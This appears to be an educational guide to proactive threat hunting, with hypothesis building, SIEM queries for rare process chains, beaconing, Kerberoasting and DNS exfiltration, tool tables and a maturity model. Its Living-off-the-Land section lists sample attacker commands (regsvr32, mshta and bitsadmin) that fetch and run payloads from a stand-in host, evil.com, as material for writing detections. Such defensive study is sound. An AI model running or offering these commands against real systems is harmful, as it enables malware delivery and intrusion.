Threat Hunting

Threat Hunting is based on the assumption: "Assume a breach." It’s not a matter of "if," but rather that attackers are already on the network. While SIEM and EDR respond to known signatures and rules, the threat hunter actively searches for anomalies, suspicious patterns, and Tactics, Techniques & Procedures (TTPs) that haven’t triggered an alert—because the attacker is flying under the radar.

Threat Hunting vs. Incident Response

Reactive Security (Traditional):

Alarm → SOC Analyst → Analysis → Response

Threat Hunting (Proactive):

Hypothesis → Data Collection → Analysis → Threat or False Positive

Hunt Cycle (PEAK Model):

1. Formulate a hypothesis (e.g., "Attacker uses Living-off-the-Land binaries")
2. Collect data (logs, EDR telemetry, NetFlow)
3. Query / Analysis (SIEM queries, stack ranking, visualization)
4. Result: Threat found or hypothesis discarded
5. Learnings → New SIEM rules → Detection engineering

Threat hunting creates value EVEN IF nothing is found:

• Confirms: Security controls work for this TTP
• New SIEM rules emerge from the hunt logic
• System knowledge grows (what is "normal" in this environment?)

Formulating Hypotheses - The Starting Point of Every Hunt

Sources of Hypotheses

1. MITRE ATT&CK;:

> "Attackers in financial institutions frequently use T1053.005 (Scheduled Task) for persistence"

Hunt: Which scheduled tasks were recently created? Baseline: Which tasks are legitimate?

2. Threat Intelligence:

> "APT29 (Cozy Bear) is known to use: spear-phishing with Word macros, Cobalt Strike as a C2 framework, LDAP enumeration for AD reconnaissance"

Hunt: Were there any abnormal LDAP queries from workstations?

3. Anomaly-based:

> "DNS traffic to unknown domains between 3:00 a.m. and 5:00 a.m." → Possible C2 beacon or DNS exfiltration

4. Crown Jewel Analysis:

> "Our most valuable data is in SharePoint and SAP" → Hunt: Who accessed this data? Unusual access volumes?

5. Red Team / Penetration Test Findings:

> "Last penetration test: lateral movement via PsExec possible" → Hunt: has PsExec been used in the last 30 days?

Hypothesis Template:

> "I believe [attacker type] [Technique from ATT&CK;] against [our asset], identifiable by [Indicator/Anomaly]"

Threat Hunting Techniques

1. Stack Counting / Frequency Analysis

Frequent activities are usually legitimate; rare ones may be suspicious.

Example: Parent-Child Process Analysis

// KQL (Kusto Query Language, Microsoft Sentinel):
DeviceProcessEvents
| summarize count() by ParentProcessName, ProcessCommandLine
| where count_ < 5                    // Rare combinations
| where ProcessCommandLine contains "powershell" or
        ProcessCommandLine contains "cmd.exe"
| order by count_ asc

Finding: winword.exe → powershell.exe (Word launches PowerShell?) → Suspicious! Possible macro execution

2. Long-tail analysis (what does the rarest X do?)

// Splunk:
index=windows EventCode=4688
| stats count by ParentProcessName, NewProcessName
| sort count asc
| head 20

Which process combinations occur only 1–2 times? Are these legitimate (admin tool) or suspicious?

3. Network Baseline and Deviations

Suricata / Zeek + ELK:

• Which internal hosts have outbound traffic to rare countries?
• DNS queries: Domains with high entropy (DGA domains)?
• Beaconing: periodic traffic at regular intervals?

Beaconing Detection (Logic):

For each Source-IP → Dest-IP combination: Calculate the interval between connections. If standard deviation < 10% of the mean → suspicious beaconing!

4. Living-off-the-Land (LotL) Detection

Attackers use native Windows tools to bypass AV:

powershell.exe -enc               <base64>:: Encoded Command
certutil.exe -decode malware.b64 output  :: File Download
regsvr32.exe /s /n /u /i:http://evil.com :: COM Hijack
mshta.exe http://evil.com/script.hta      :: Remote HTA
wmic process call create &quot;payload.exe&quot;   :: WMI Process Launch
bitsadmin.exe /transfer malware http://evil.com/m.exe %temp%\m.exe

// Splunk Hunt:
index=windows EventCode=4688
| search NewProcessName IN ("certutil.exe", "bitsadmin.exe", "mshta.exe")
| table _time, ComputerName, ParentProcessName, CommandLine

5. Kerberoasting Hunt (Active Directory)

Attackers request service tickets and crack hashes offline.

// Event ID 4769 (Kerberos Service Ticket Requested):
index=windows EventCode=4769
| where TicketEncryptionType="0x17"     // RC4 encryption (weak!)
| stats count by TargetUserName, ServiceName, IpAddress
| where count > 10                       // Many requests = suspicious

6. DNS Exfiltration Hunt

Attackers tunnel data via DNS queries.

# Zeek log analysis:
cat dns.log | awk '{print length($9), $9}' | sort -rn | head 20
# Long DNS queries? > 50 characters in subdomain?

# Python analysis:
import dns_log
for query in dns_queries:
    subdomain = query.domain.split('.')[0]
    if len(subdomain) > 40:           # Long subdomain portion
        entropy = calculate_entropy(subdomain)
        if entropy > 3.5:             # High entropy → base64/hex
            flag_as_suspicious(query)

Threat Hunting Tools

SIEM Platforms

Platform	Features
Microsoft Sentinel	KQL, Jupyter Notebooks, MITRE ATT&CK; integration
Splunk SIEM	SPL queries, Phantom SOAR integration
Elastic SIEM	EQL (Event Query Language), Kibana
QRadar	AQL, MITRE ATT&CK; mapping

EDR Platforms (for Endpoint Telemetry)

Platform	Features
CrowdStrike Falcon	Threat Graph, RTR (Remote Response)
Microsoft Defender	Advanced Hunting (KQL), MDE logs
SentinelOne	Deep Visibility, story-based analysis
Carbon Black	Live Query, Process Trees

Specialized Tools

Tool	Function
Zeek (Bro)	Network traffic analysis, protocol logs
RITA	Detection of beaconing, C2 communication
Velociraptor	Endpoint forensics, hunting at scale
OSQuery	SQL-like endpoint queries
Hayabusa	Fast Windows event log analysis (Rust)
Chainsaw	Windows event log hunting
yarGen / YARA	Malware hunting with YARA rules

MITRE ATT&CK as a Hunting Framework

ATT&CK Categories for Systematic Hunting

Category	Hunt Focus
Reconnaissance (T1590-T1598)	Suspicious DNS lookups against internal systems; port scanning of internal hosts
Initial Access (T1566-T1199)	Phishing attachments (Office macros, ISO files); VPN logins from unusual geolocations
Execution (T1059)	PowerShell with encoded commands; WMI remote execution
Persistence (T1053, T1547)	New scheduled tasks; registry run keys
Privilege Escalation (T1548, T1134)	UAC bypass techniques; token impersonation
Defense Evasion (T1562, T1070)	Event log deletion (Event Code 1102); Antivirus Disablement
Credential Access (T1003, T1558)	LSASS Access (Mimikatz); Kerberoasting (Event Code 4769)
Lateral Movement (T1021)	PsExec Usage; WinRM from Unusual Hosts
Exfiltration (T1041, T1048)	Large amounts of data exfiltrated via HTTPS; DNS tunneling

ATT&CK Hunt Prioritization:

• Which techniques are most common in our industry? (CISA Alerts)
• Which ones have we not yet covered? (Coverage Matrix)
• Which ones have a high impact but low detection probability?

Threat Hunting Maturity Model

Level 0 - Reactive

• Alarm-based response only
• No proactive hunting
• Many SIEM alerts, little context

Level 1 - Minimal

• IOC-based hunting (IP/domain/hash lists)
• Threat intelligence feeds are cross-referenced
• No hypothesis-based hunting yet

Level 2 - Procedural

• Hypotheses from ATT&CK
• Standardized hunt playbooks
• Detection engineering based on hunt results

Level 3 - Innovative

• Machine learning for anomaly detection
• Custom data sources (honeypots, deception)
• Hunting results feed into red team scenarios

Level 4 - Leading

• Automated hunting (SOAR-supported)
• Crowdsourced threat intelligence
• Continuous hunting programs with KPIs
• Threat intelligence sharing with industry partners (ISACs)